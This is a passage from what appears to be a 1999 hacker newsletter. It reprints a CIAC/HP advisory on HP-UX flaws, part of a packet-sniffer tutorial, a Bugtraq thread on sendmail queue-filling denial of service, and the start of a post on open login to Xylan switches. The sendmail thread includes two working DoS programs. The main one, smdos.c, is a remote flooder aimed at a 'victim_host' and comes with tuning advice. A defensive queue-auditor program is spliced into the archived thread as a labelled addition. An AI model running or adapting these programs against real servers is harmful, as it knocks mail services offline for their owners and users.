       
               1. Beej's Guide to Network Programming
                    This is an awesome paper that really helps 
                    clear up any misconceptions about network programming.
                       [http://www.ecst.csuchico.edu/~beej/guide/net]
       
               2. TCP/IP Illustrated Vol 1,2,3
                  W.Richard Stevens
       
       To use the above program, cut out the above code and strip off all 
       of the line numbers. Save the edited file as sniff.c. Next cut 
       out the header file headers.h (below) and save it to a file headers.h
       in the same directory. Now just compile: gcc -o sniff sniff.c
       You should now have the executable "sniff", to run it type
       #./sniff
       
       /*************************headers.h**************************/
       /*structure of an ip header             */
       struct ip {
               unsigned int        ip_length:4;    /*little-endian*/
               unsigned int        ip_version:4;
               unsigned char       ip_tos;
               unsigned short      ip_total_length;
               unsigned short      ip_id;
               unsigned short      ip_flags;
               unsigned char       ip_ttl;
               unsigned char       ip_protocol;
               unsigned short      ip_cksum;
               unsigned int        ip_source;
               unsigned int        ip_dest;
       };
       
       /* Structure of a TCP header */
       struct tcp {
               unsigned short      tcp_source_port;
               unsigned short      tcp_dest_port;
               unsigned int        tcp_seqno;
               unsigned int        tcp_ackno;
               unsigned int        tcp_res1:4,     /*little-endian*/
               tcp_hlen:4,
               tcp_fin:1,
               tcp_syn:1,
               tcp_rst:1,
               tcp_psh:1,
               tcp_ack:1,
               tcp_urg:1,
               tcp_res2:2;
               unsigned short      tcp_winsize;
               unsigned short      tcp_cksum;
               unsigned short      tcp_urgent;
       };
       /*********************EOF***********************************/
       
       *
       
       @HWA
       
 09.0  CIAC Security advisory on HP-UX ftp,hpterm
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
        Missed this in last issue, go figure I was having a month....
       
       
       
       Date: Wed, 31 Mar 1999 11:30:48 -0800 (PST)
       From: CIAC Mail User <ciac@rumpole.llnl.gov>
       To: ciac-bulletin@rumpole.llnl.gov
       Subject: CIAC Bulletin J-038:  HP-UX Vulnerabilities (hpterm, ftp)
       
       [ For Public Release ]
       -----BEGIN PGP SIGNED MESSAGE-----
       
                    __________________________________________________________
       
                              The U.S. Department of Energy
                           Computer Incident Advisory Capability
                                  ___  __ __    _     ___
                                 /       |     /_\   /
                                 \___  __|__  /   \  \___
                    __________________________________________________________
       
                                    INFORMATION BULLETIN
       
                             HP-UX Vulnerabilities (hpterm, ftp)
                           H-P Security Bulletins #00093 and #00094
       
       March 31, 1999 15:00 GMT                                          Number J-038
       ______________________________________________________________________________
       PROBLEM:       Two vulnerabilities have been identified by Hewlett-Packard
                      Company.
                      1) PHSS_13560 introduced a library access problem into hpterm.
                      2) There is a Security Vulnerability during ftp operations.
       PLATFORM:      1) HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
                      2) HP9000 Series 7/800 running HP-UX release 11.00 only.
       DAMAGE:        Users can gain increased privileges.
       SOLUTION:      Apply patches.
       ______________________________________________________________________________
       VULNERABILITY  Risk is high. Both of these vulnerabilities affect systems
       ASSESSMENT:    security. Patches should be applied as soon as possible.
       ______________________________________________________________________________
       
       [Start Hewlett-Packard Company Advisory]
       
       1) PHSS_13560
       
       Document ID:  HPSBUX9903-093
       Date Loaded:  19990317
             Title:  Security Vulnerability with hpterm on HP-UX 10.20
       
       - -----------------------------------------------------------------------
           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999
       - -----------------------------------------------------------------------
       
        The information in the following Security Bulletin should be acted upon
        as soon as possible.  Hewlett-Packard Company will not be liable for any
        consequences to any customer resulting from customer's failure to fully
        implement instructions in this Security Bulletin as soon as possible.
       
       - -----------------------------------------------------------------------
       PROBLEM:   PHSS_13560 introduced a library access problem into hpterm.
       
       PLATFORM:  HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
       
       DAMAGE:    Users can gain increased privileges.
       
       SOLUTION:  Install PHSS_17830.
       
       AVAILABILITY:  The patch is available now.
       
       - -----------------------------------------------------------------------
       I.
          A. Background
       
             PHSS_13560 introduced a library access problem into hpterm, the
             terminal emulator for the X Window system. (See hpterm(1)).
       
          B. Fixing the problem
       
             Installing patch PHSS_17830 completely fixes this problem.
       
             NOTE: Three older hpterm patches have been released including
             PHSS_13560, PHSS_15431, and PHSS_17332.  All of these older
             patches are being superseded with the release of the
             PHSS_17830.
       
             Do not use PHSS_13560, PHSS_15431, or PHSS_17332.
       
       
          C. To subscribe to automatically receive future NEW HP Security
             Bulletins from the HP Electronic Support Center via electronic
             mail, do the following:
       
             Use your browser to get to the HP Electronic Support Center page
             at:
       
               http://us-support.external.hp.com
                      (for US, Canada, Asia-Pacific, & Latin-America)
               http://europe-support.external.hp.com     (for Europe)
       
             Login with your user ID and password (or register for one).
             Remember to save the User ID assigned to you, and your password.
             Once you are in the Main Menu:
             To -subscribe- to future HP Security Bulletins,
               click on "Support Information Digests".
             To -review- bulletins already released from the main Menu,
               click on the "Technical Knowledge Database (Security Bulletins
               only)".
             Near the bottom of the next page, click on "Browse the HP Security
             Bulletin Archive".
       
             Once in the archive there is another link to our current Security
             Patch Matrix.  Updated daily, this matrix categorizes security
             patches by platform/OS release, and by bulletin topic.
       
              The security patch matrix is also available via anonymous ftp:
       
              us-ffs.external.hp.com
              ~ftp/export/patches/hp-ux_patch_matrix
       
           D. To report new security vulnerabilities, send email to
       
              security-alert@hp.com
       
              Please encrypt any exploit information using the security-alert
              PGP key, available from your local key server, or by sending a
              message with a -subject- (not body) of 'get key' (no quotes) to
              security-alert@hp.com.
       
             Permission is granted for copying and circulating this Bulletin to
             Hewlett-Packard (HP) customers (or the Internet community) for the
             purpose of alerting them to problems, if and only if, the Bulletin
             is not edited or changed in any way, is attributed to HP, and
             provided such reproduction and/or distribution is performed for
             non-commercial purposes.
       
             Any other use of this information is prohibited. HP is not liable
             for any misuse of this information by any third party.
       _____________________________________________________________________
       - ---End of Document ID:  HPSBUX9903-093---------------------------------
       
       2) ftp
       
       Document ID:  HPSBUX9903-094
       Date Loaded:  19990323
             Title:  Security Vulnerability with ftp on HP-UX 11.00
       
       - -----------------------------------------------------------------------
           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00094, 24 March 1999
       - -----------------------------------------------------------------------
       
        The information in the following Security Bulletin should be acted upon
        as soon as possible.  Hewlett-Packard Company will not be liable for any
        consequences to any customer resulting from customer's failure to fully
        implement instructions in this Security Bulletin as soon as possible.
       
       - -----------------------------------------------------------------------
       PROBLEM:  Security Vulnerability during ftp operations.
       
       PLATFORM: HP9000 Series 7/800 running HP-UX release 11.00 only.
       
       DAMAGE:   Users can increase privileges
       
       SOLUTION: Apply the patch specified below
       
       AVAILABILITY: The patch is available now.
       - -----------------------------------------------------------------------
       I.
          A. Background
             Hewlett-Packard Company has found that during normal operations,
             the ftp program might grant users increased privileges.
       
          B. Fixing the problem
             Obtaining and installing the following patch will completely close
             this vulnerability.  Rebooting the system will NOT be required.
       
             For all HP9000 S7/800 platforms running HP-UX 11.00:  PHCO_17601
       
        C. To subscribe to automatically receive future NEW HP Security
             Bulletins or access the HP Electronic Support Center, use your
             browser to get to our ESC web page at:
       
             http://us-support.external.hp.com   (for non-European locations),
             or  http://europe-support.external.hp.com  (for Europe)
       
             Login with your user ID and password (or register for one).
             Remember to save the User ID/password assigned to you.
       
             Once you are in the Main Menu:
             To -subscribe- to future HP Security Bulletins,
               click on "Support Information Digests".
             To -review Security bulletins already released-,
               click on the "Search Technical Knowledge Database."
             To -retrieve patches-, click on "Individual Patches" and select
               appropriate release and locate with the patch identifier (ID).
             To -browse the HP Security Bulletin Archive-,  select the link at
              the bottom of the page once in the "Support Information Digests".
             To -view the Security Patch Matrix-, (updated daily) which
              categorizes security patches by platform/OS release, and by
              bulletin topic, go to the archive (above) and follow the links.
       
             The security patch matrix is also available via anonymous ftp:
             us-ffs.external.hp.com   or  ~ftp/export/patches/hp-ux_patch_matrix
       
          D. To report new security vulnerabilities, send email to
       
              security-alert@hp.com
       
             Please encrypt any exploit information using the security-alert
             PGP key, available from your local key server, or by sending a
             message with a -subject- (not body) of 'get key' (no quotes) to
             security-alert@hp.com.
       
            Permission is granted for copying and circulating this Bulletin to
            Hewlett-Packard (HP) customers (or the Internet community) for the
            purpose of alerting them to problems, if and only if, the Bulletin
            is not edited or changed in any way, is attributed to HP, and
            provided such reproduction and/or distribution is performed for
            non-commercial purposes.
       
            Any other use of this information is prohibited. HP is not liable
            for any misuse of this information by any third party.
       ______________________________________________________________________
       - ---End of Document ID:  HPSBUX9903-094---------------------------------
       
       [End Hewlett-Packard Company Advisory]
       ___________________________________________________________________________
       
       
       CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for
       the information contained in this bulletin.
       ___________________________________________________________________________
       
       
       
       CIAC, the Computer Incident Advisory Capability, is the computer
       security incident response team for the U.S. Department of Energy
       (DOE) and the emergency backup response team for the National
       Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
       National Laboratory in Livermore, California. CIAC is also a founding
       member of FIRST, the Forum of Incident Response and Security Teams, a
       global organization established to foster cooperation and coordination
       among computer security teams worldwide.
       
       CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
       can be contacted at:
           Voice:    +1 925-422-8193
           FAX:      +1 925-423-8002
           STU-III:  +1 925-423-2604
           E-mail:   ciac@llnl.gov
       
       For emergencies and off-hour assistance, DOE, DOE contractor sites,
       and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
       8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
       or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
       Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
       duty person, and the secondary PIN number, 8550074 is for the CIAC
       Project Leader.
       
       Previous CIAC notices, anti-virus software, and other information are
       available from the CIAC Computer Security Archive.
       
          World Wide Web:      http://www.ciac.org/
                               (or http://ciac.llnl.gov -- they're the same machine)
          Anonymous FTP:       ftp.ciac.org
                               (or ciac.llnl.gov -- they're the same machine)
          Modem access:        +1 (925) 423-4753 (28.8K baud)
                               +1 (925) 423-3331 (28.8K baud)
       
       CIAC has several self-subscribing mailing lists for electronic
       publications:
       1. CIAC-BULLETIN for Advisories, highest priority - time critical
          information and Bulletins, important computer security information;
       2. SPI-ANNOUNCE for official news about Security Profile Inspector
          (SPI) software updates, new features, distribution and
          availability;
       3. SPI-NOTES, for discussion of problems and solutions regarding the
          use of SPI products.
       
       Our mailing lists are managed by a public domain software package
       called Majordomo, which ignores E-mail header subject lines. To
       subscribe (add yourself) to one of our mailing lists, send the
       following request as the E-mail message body, substituting
       ciac-bulletin, spi-announce OR spi-notes for list-name:
       
       E-mail to       ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
               subscribe list-name
         e.g., subscribe ciac-bulletin
       
       You will receive an acknowledgment email immediately with a confirmation
       that you will need to mail back to the addresses above, as per the
       instructions in the email.  This is a partial protection to make sure
       you are really the one who asked to be signed up for the list in question.
       
       If you include the word 'help' in the body of an email to the above address,
       it will also send back an information file on how to subscribe/unsubscribe,
       get past issues of CIAC bulletins via email, etc.
       
       PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
       communities receive CIAC bulletins.  If you are not part of these
       communities, please contact your agency's response team to report
       incidents. Your agency's team will coordinate with CIAC. The Forum of
       Incident Response and Security Teams (FIRST) is a world-wide
       organization. A list of FIRST member organizations and their
       constituencies can be obtained via WWW at http://www.first.org/.
       
       This document was prepared as an account of work sponsored by an
       agency of the United States Government. Neither the United States
       Government nor the University of California nor any of their
       employees, makes any warranty, express or implied, or assumes any
       legal liability or responsibility for the accuracy, completeness, or
       usefulness of any information, apparatus, product, or process
       disclosed, or represents that its use would not infringe privately
       owned rights. Reference herein to any specific commercial products,
       process, or service by trade name, trademark, manufacturer, or
       otherwise, does not necessarily constitute or imply its endorsement,
       recommendation or favoring by the United States Government or the
       University of California. The views and opinions of authors expressed
       herein do not necessarily state or reflect those of the United States
       Government or the University of California, and shall not be used for
       advertising or product endorsement purposes.
       
       LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
       
       J-027: Digital Unix  Vulnerabilities ( at , inc  )
       J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
       J-029: Buffer Overflows in Various FTP Servers
       J-030: Microsoft BackOffice Vulnerability
       J-031: Debian Linux "Super" package Buffer Overflow
       J-032: Windows Backdoors Update II:
       J-034: Cisco 7xx TCP and HTTP Vulnerabilities
       J-035: Linux Blind TCP Spoofing
       J-036: LDAP Buffer overflow against Microsoft Directory Services
       J-037: W97M.Melissa Word Macro Virus
       
       -----BEGIN PGP SIGNATURE-----
       Version: 4.0 Business Edition
       
       iQCVAwUBNwJkHLnzJzdsy3QZAQHrWAP9E27Nc3P8XLWJ1IM/JOzMdHy5mvymnUdh
       dzkEuldX35r+KGPlZYGxAq6NbKeYQFgi24C1OHg7V/MhcgnXKHPB6DN7Zdd6g6ii
       sUAnZ7LD3MqQb7OIMq2D3GdWzLzn/u5qpanKt1VjNYtQCGi4RbH9YgJFnLFgma8I
       dX/jer4bE6M=
       =Q2lE
       -----END PGP SIGNATURE-----
       
       @HWA
       
 10.0  Sendmail DoS on versions up to the latest version 8.9.3
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Thu, 1 Apr 1999 14:00:16 +0000
       From: Lukasz Luzar <lluzar@NONAME.KKI.KRAKOW.PL>
       To: BUGTRAQ@netspace.org
       Subject: Possible local DoS in sendmail
       
       Hi,
        It seems that sendmail run with the -t option does NOT block SIGINT ...
        While we are sending data to its stdin, if we press CTRL-C the process is
        killed, but the unfinished letter remains in the queue.
        It stays there quite long - long enough to fill the partition on which
        /var/spool/mqueue resides.
        When that happens, sendmail doesn't allow new connections - so it is a kind
        of DoS attack on this service.
        It has been tested on all new versions of sendmail up to the current one (8.9.3).
       
       Example ...
       
         --- CUT HERE ----
         #include <stdio.h>
         #include <stdlib.h>           /* exit() */
         #include <unistd.h>
         #include <signal.h>
         #include <sys/wait.h>
        
         #define DELAY 5              /* time in seconds needed to reach
                                         MaxMessageSize limit */
         #define SM_PATH "/usr/sbin/sendmail -t"
        
         int main(void)
         {
                FILE    *fd;
                int     pid;
        
                for(;;) {
                        if(( pid = fork()) == 0) {
                                /* child: own process group, so the SIGINT sent
                                   below reaches this child and the sendmail it
                                   popen()s */
                                setpgrp();
                                if(( fd = popen( SM_PATH, "w")) == NULL) {
                                        fprintf( stderr, "popen error\n");
                                        exit( 1);
                                }
        
                                /* feed sendmail an endless message body */
                                for(;;) fputc( 'A', fd);
                        } else {
                                /* parent: let the df* file grow, interrupt the
                                   whole group mid-submission, then start over */
                                sleep( DELAY);
                                kill( (-1) * pid, SIGINT);
                                fprintf( stdout, "next\n");
                                wait( NULL);
                        }
                }
                return 0;
         }
        --- CUT HERE ---
       
       Regards,
       
       ---
       Lukasz Luzar                               K.K.I.
       http://noname.kki.krakow.pl/           lluzar@kki.pl
       
       ---------------------------------------------------------------------
       
       Date: Thu, 1 Apr 1999 14:41:41 -0500
       From: KuRuPTioN <kuruption@CHA0S.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: Possible local DoS in sendmail
       
        Well, this is very interesting... this is what I found by running this
        binary for 30 seconds =)
       
       Before:
       
       # df /
       Filesystem         1024-blocks  Used Available Capacity Mounted on
       /dev/hda1             303251   87681   199909     30%   /
       # ps auwx | grep sendmail
       root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
       accepting connections on port 25
       # ls -l /var/spool/mqueue
       total 0
       #
       
       After (30 seconds running):
       
       # df /
       Filesystem         1024-blocks  Used Available Capacity Mounted on
       /dev/hda1             303251  107548   180042     37%   /
       (not too bad but another 30 seconds later another df)
       
       Filesystem         1024-blocks  Used Available Capacity Mounted on
       /dev/hda1             303251  146235   141355     51%   /
       
       # ps auwx | grep sendmail
       mail     17144 70.5  0.4  1348   820  p1 R   11:35   0:48
       /usr/sbin/sendmail -t
       root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
       accepting connections on port 25
       (sendmail kindly using 70% of my CPU)
       
       # ls -l /var/spool/mqueue
       total 115854
       -rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
       -rw-------   1 mail     mail            0 Apr  1 11:35 qfLAA17144
       -rw-------   1 mail     mail            0 Apr  1 11:35 xfLAA17144
       
       (once again a df)
       # df /
       Filesystem         1024-blocks  Used Available Capacity Mounted on
       /dev/hda1             303251  224734    62856     78%   /
       
       and once the hard drive becomes filled sendmail stops accepting connections
       since it has no temp space.
       
       # df /
       Filesystem         1024-blocks  Used Available Capacity Mounted on
       /dev/hda1             303251  287590        0    100%   /
       # ps auwx | grep sendmail
       mail     17144 68.5  0.4  1348   820  p1 R   11:35   2:33
       /usr/wrapped/sendmail -t
       root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
       rejecting connections on port 25: min free: 100
       #
       
       People, this is no april fools joke =)
       
       Raymond T Sundland
       MCSE, MCP, MCP+Internet
       PGP Key: finger pgp@24.3.181.22
       
       -----------------------------------------------------------------------------------
       
       Date: Fri, 2 Apr 1999 10:23:26 -0800
       From: Gregory Neil Shapiro <gshapiro@SENDMAIL.ORG>
       To: BUGTRAQ@netspace.org
       Subject: Re: Possible local DoS in sendmail
       
       -----BEGIN PGP SIGNED MESSAGE-----
       
       Lukasz> In that moment while we are sending data to its stdin, when we will
       Lukasz> press CTRL-C process is being killed, but in queue rests unfinished
       Lukasz> letter.  It stays there quite long - long enought to fullfill
       Lukasz> partition on disk where /var/spool/mqueue resides.  When it
       Lukasz> happends, sendmail doesn't allow new connections - so it is a kind
       Lukasz> of DoS attack for this service.  It has been tested on all new
       Lukasz> versions on sendmail up to current (8.9.3).
       
       Thanks for posting this info Lukasz.
       
       Unfortunately we believe this is just a variation on the many Denial of
       Service attacks possible from a Unix shell.  In fact, it's "yet another
       queue filling" exercise.  This problem affects most, if not all MTAs.
       
       Interestingly, the proposed DOS is less severe than the usual queue filling
       strategies such as repeatedly submitting large mails to an undeliverable
       address, such as someone@[10.255.255.255].
       
       The reason for this is that the derelict files will be removed by the next
       scheduled queue run.  In the case of legitimately queued mail, it will take
       the full queue return timeout before the queue entry is removed (assuming a
       lack of intervention on the administrator's part).
       
       The valid point you do raise is that shell-based DOS attacks are hard to
       deal with.  In many cases, the only recourse is to identify and stop the
       offender.
       
       In this case we suggest that if this attack is a possibility at your site,
       you use process accounting to help trace the malicious user.  Also, unless
       your script gets the timing exactly right every time, the queue submission
       will complete which will give more information about the identity of the
       attacker.  As a side note, setting the MaxMessageSize option prevents any
       one message from filling the queue.
       
       Having said that, it does point out that sendmail could log the username
       and queue ID earlier to help make tracing this sort of attack even easier.
       We will look into the benefits of doing this for a future release.
       
       
        Lukasz, as a final point, we really appreciate you raising this issue but in
        the future, we would prefer some consultation prior to posting to bugtraq.
        This will allow us to have all of the information available at the time of
        the posting.  The address to contact us is sendmail-bugs@sendmail.org.
       
       Conclusion.  Queue filling DOS attacks are not unique to sendmail.  This is
       not a new problem.  There is no general solution to this and many other DOS
       attacks apart from identifying and stopping the malicious user.
       
       -----BEGIN PGP SIGNATURE-----
       Version: PGPfreeware 5.0 for non-commercial use
       Comment: Processed by Mailcrypt 3.5.3, an Emacs/PGP interface
       Charset: noconv
       
       iQCVAwUBNwUKvXxLZ22gDhVjAQEv9QP9EgU5zmNeAZ63tUiRoq3C6OSbXEJ4yvw4
       PLCkOWUJ4etCzBKa5i1/SCa9/mW+WHmR3WobNCI5m8Y9AqYjSSe+gQgnWXXH5CJH
       fRgtRNrvVewAIsW84QRQDFdapLPiq4ZZbEu7w55WNVdgnZwwTqXGeLJEgP+cAcTl
       ehf8dKqtahk=
       =7/+l
       -----END PGP SIGNATURE-----
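        The detection side of this, as an added example that is not part of the thread
        or of sendmail itself: a small C auditor that pairs each df* data file in a queue
        directory with its qf* control file and flags entries whose control file is
        missing or empty (the interrupted-submission state in the ls listing earlier in
        this thread), plus any data file larger than the MaxMessageSize you would enforce.
        The queue directory, queue IDs and file sizes built by run_demo() are constructed
        for the demo to mirror that listing; they are not taken from a real host.

```c
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* What one pass over a sendmail-style queue directory found. */
struct queue_report {
    int  entries;        /* df* (data) files seen */
    int  orphaned;       /* df* whose qf* control file is missing or empty: submission never completed */
    long orphaned_bytes; /* disk held by those orphaned df* files */
    int  oversized;      /* df* larger than the MaxMessageSize we would enforce */
};

/* Pair every dfID with its qfID. sendmail fills in qf* when the submission completes, so an
 * empty or missing qf* next to a growing df* is a submission that was interrupted (or is still
 * being fed), the state the thread's ps/ls output shows. Returns 0, or -1 with errno set. */
int audit_queue(const char *qdir, long max_message_size, struct queue_report *rep)
{
    DIR *d = opendir(qdir);
    struct dirent *de;
    char path[4096];
    struct stat df, qf;

    if (d == NULL) return -1;
    memset(rep, 0, sizeof *rep);
    while ((de = readdir(d)) != NULL) {
        if (strncmp(de->d_name, "df", 2) != 0) continue;
        snprintf(path, sizeof path, "%s/%s", qdir, de->d_name);
        if (stat(path, &df) == -1 || !S_ISREG(df.st_mode)) continue;
        rep->entries++;
        snprintf(path, sizeof path, "%s/qf%s", qdir, de->d_name + 2);
        if (stat(path, &qf) == -1 || qf.st_size == 0) {
            rep->orphaned++;
            rep->orphaned_bytes += (long)df.st_size;
        }
        if ((long)df.st_size > max_message_size) rep->oversized++;
    }
    closedir(d);
    return 0;
}

/* Demo helper: create dir/name holding nbytes of filler. */
static int write_file(const char *dir, const char *name, long nbytes)
{
    char path[4096];
    FILE *f;
    long i;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    if ((f = fopen(path, "w")) == NULL) return -1;
    for (i = 0; i < nbytes; i++) fputc('X', f);
    return fclose(f);
}

/* Builds a throwaway queue (constructed data, mirroring the thread's listing): LAA17144 is an
 * interrupted submission with an empty qf*, MAA17200 a legitimately queued small message.
 * Audits it with a 1 KB MaxMessageSize, then removes it. Returns 0 on success. */
int run_demo(struct queue_report *rep)
{
    static const char *names[] = { "dfLAA17144", "qfLAA17144", "xfLAA17144",
                                   "dfMAA17200", "qfMAA17200" };
    static const long sizes[]  = { 4096, 0, 0, 100, 64 };
    char dir[] = "/tmp/mqueue-demo.XXXXXX";
    char path[4096];
    int rc, i;

    if (mkdtemp(dir) == NULL) return -1;
    for (i = 0; i < 5; i++)
        if (write_file(dir, names[i], sizes[i]) != 0) return -1;
    rc = audit_queue(dir, 1024, rep);
    for (i = 0; i < 5; i++) {            /* tidy up: a demo must not fill /tmp itself */
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        unlink(path);
    }
    rmdir(dir);
    return rc;
}

int main(int argc, char **argv)
{
    struct queue_report r;
    /* With a queue directory argument, audit that; otherwise run the constructed demo. */
    int rc = (argc > 1) ? audit_queue(argv[1], 1048576L, &r) : run_demo(&r);
    if (rc != 0) { perror("audit"); return 1; }
    printf("entries=%d orphaned=%d orphaned_bytes=%ld oversized=%d\n",
           r.entries, r.orphaned, r.orphaned_bytes, r.oversized);
    return 0;
}
```

        Run it without arguments for the constructed demo, or point it at a real queue
        directory. Between queue runs it shows exactly the derelict df* files Shapiro says
        the next run discards, and the st_uid of those files is the user that process
        accounting would lead you to.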
        
       Date: Sat, 3 Apr 1999 00:42:56 +0200
        From: "Michał Szymański" <siwa9@BOX43.GNET.PL>
       To: BUGTRAQ@netspace.org
       Subject: Re: Possible local DoS in sendmail
       
       Hi folks,
       
        This local queue filling DoS attack in sendmail is quite dangerous. But a good
        security policy (like mine) will prevent attackers from doing such things.
        Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by
        root.attacker's_group; turn on quotas for group 'attacker's_group' on the
        file system containing the /var/spool/mqueue directory, and your host will not be
        vulnerable; but you _have to_ configure your sendmail as a _nosuid_ daemon.
        
        Much more dangerous are remote queue filling DoS attacks. If you have relaying
        enabled, you can use the smdos.c proggie shown below; it will quite quickly fill
        the partition on which /var/spool/mqueue resides. You should notice an increased
        LA during the attack; in contrast to local DoS attacks, control files created by
        smdos.c are owned by root.root, so ... it's much more difficult to prevent
        offenders from doing it.
        
        Don't forget to change the BSIZE definition (in smdos.c) to the victim host's
        message size limitation (MaxMessageSize option); you can also increase the
        MAXCONN definition.
       
       smdos.c:
       
        --- CUT HERE ---
        /*
        By Michal Szymanski <siwa9@box43.gnet.pl>
        
        Sendmail DoS (up to 8.9.3);
        
        Sat Apr  3 00:12:31 CEST 1999
        */
        
        #include <stdio.h>
        #include <stdlib.h>          /* exit() */
        #include <string.h>          /* strlen() */
        #include <strings.h>         /* bzero(), bcopy() */
        #include <unistd.h>          /* read(), write(), close(), fork(), sleep(), usleep() */
        #include <sys/types.h>
        #include <sys/socket.h>
        #include <sys/wait.h>        /* waitpid() */
        #include <netinet/in.h>
        #include <arpa/inet.h>
        #include <netdb.h>
        #include <errno.h>
        
        #undef VERBOSE          /* define it, if MORECONN is undefined */
        
        #define MORECONN
        
        // #define RCPT_TO      "foo@ftp.onet.pl"
        
        /* undeliverable recipient: the message sits in the queue until the return timeout */
        #define RCPT_TO "foo@10.255.255.255"
        
        #ifdef MORECONN
        #define MAXCONN 5               /* parallel submitting processes */
        #endif
        
        #define BSIZE   1048576         /* df* control file size; match the victim's MaxMessageSize */
        #define PORT    25
        
        char buffer[BSIZE];
        int sockfd, x, loop, chpid;
        
        void usage(char *fname) {
            fprintf(stderr, "Usage: %s <victim_host>\n", fname);
            exit(1);
        }
        
        /* Send one SMTP command, then read (and in VERBOSE mode print) the server's reply. */
        void say(char *what) {
            if (write(sockfd, what, strlen(what)) < 0) {
                perror("write()");
                exit(errno);
            }
        
        #ifdef VERBOSE
            fprintf(stderr, "<%s", what);
        #endif
        
            bzero(buffer, BSIZE);
        
            usleep(1000);
        
            if (read(sockfd, buffer, BSIZE) < 0) {
                perror("read()");
                exit(errno);
            }
        
        #ifdef VERBOSE
            fputs(buffer, stderr);      /* never hand server output to printf as a format string */
        #endif
        }
        
        int main(int argc, char *argv[]) {
            struct sockaddr_in serv_addr;
            struct hostent *host;
            char *hostname, hostaddr[20];   /* hostaddr is filled in but never used */
        
            fprintf(stderr, "Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");
        
            if (argc < 2) usage(argv[0]);
        
        #ifdef VERBOSE
            fprintf(stderr, ">Preparing address. \n");
        #endif
        
            hostname = argv[1];
        
            serv_addr.sin_port = htons(PORT);
            serv_addr.sin_family = AF_INET;
        
            /* accept a dotted quad directly, otherwise resolve the name */
            if ((serv_addr.sin_addr.s_addr = inet_addr(hostname)) == INADDR_NONE) {
        
        #ifdef VERBOSE
                fprintf(stderr, ">Getting info from DNS.\n");
        #endif
        
                if ((host = gethostbyname(hostname)) == NULL) {
                    herror("gethostbyname()");
                    exit(h_errno);
                }
        
                serv_addr.sin_family = host->h_addrtype;
        
                bcopy(host->h_addr, (char *)&serv_addr.sin_addr, host->h_length);
        
        #ifdef VERBOSE
                fprintf(stderr, ">Official name of host: %s\n", host->h_name);
        #endif
        
                hostname = host->h_name;
        
                sprintf(hostaddr, "%d.%d.%d.%d", (unsigned char)host->h_addr[0],
                                                 (unsigned char)host->h_addr[1],
                                                 (unsigned char)host->h_addr[2],
                                                 (unsigned char)host->h_addr[3]);
        
            }
            else snprintf(hostaddr, sizeof hostaddr, "%s", hostname);
        
        #ifdef MORECONN
            /* fork MAXCONN children; each submits messages in an endless loop */
            for (; loop < MAXCONN; loop++) if (!(chpid = fork())) {
        #endif
        
            for (;;) {
        
                bzero(&(serv_addr.sin_zero), 8);
        
                if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                    perror("socket()");
                    exit(errno);
                }
        
                if ((connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))) == -1) {
                    perror("connect()");
                    exit(errno);
                }
        
        #ifdef VERBOSE
                fprintf(stderr, ">Connected to [%s:%d].\n", hostname, PORT);
        #endif
        
                bzero(buffer, BSIZE);
                read(sockfd, buffer, BSIZE);        /* greeting banner */
        #ifdef VERBOSE
                fputs(buffer, stderr);
        #else
                fprintf(stderr, ".");
        #endif
        
                say("helo foo\n");
                say("mail from:root@localhost\n");
                say("rcpt to:" RCPT_TO "\n");
                say("data\n");
        
                /* BSIZE bytes of body (the original loop ran to x<=BSIZE and wrote one
                   byte past the end of buffer) */
                for (x = 0; x < BSIZE; x++) buffer[x] = 'X';
                write(sockfd, buffer, BSIZE);
        
                say("\n.\n");
                sleep(1);
                say("quit\n");
        
                shutdown(sockfd, 2);
        
                close(sockfd);
        
        #ifdef VERBOSE
                fprintf(stderr, ">Connection closed successfully.\n");
        #endif
            }
        #ifdef MORECONN
            }
            waitpid(chpid, NULL, 0);
        #endif
            return 0;
        }
        --- CUT HERE ---
       



       @HWA
       
 11.0  Xylan Omniswitch 'features' (DoS)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Wed, 31 Mar 1999 19:12:20 +0000
       From: pmsac@TOXYN.ORG
       To: BUGTRAQ@netspace.org
       Subject: Xylan OmniSwitch "features"
       
       Sorry if this is already known.
       
       Stepped into two "features" of Xylan OmniSwitches (also works on Pizza).
       These switches are sold OEM to Alcatel (which just bought Xylan) and IBM.
       
        Number one: anyone can telnet to the switch and log in, without knowing
        either user or password strings. No permission will be given to perform
        any command, which is not so bad.
        This could work as a DoS, because software versions until 3.1.8 (don't know
        about later ones) only allow one interactive session, displaying a message
        of "System already in use" on other attempts. However, since you can do this
        DoS even without logging in (just sitting at the login prompt) it's not much
        of a DoS.
        
        Number two: anyone can ftp to the switch, without knowing either user or
        password strings. Everyone is allowed to read all files in the flash,
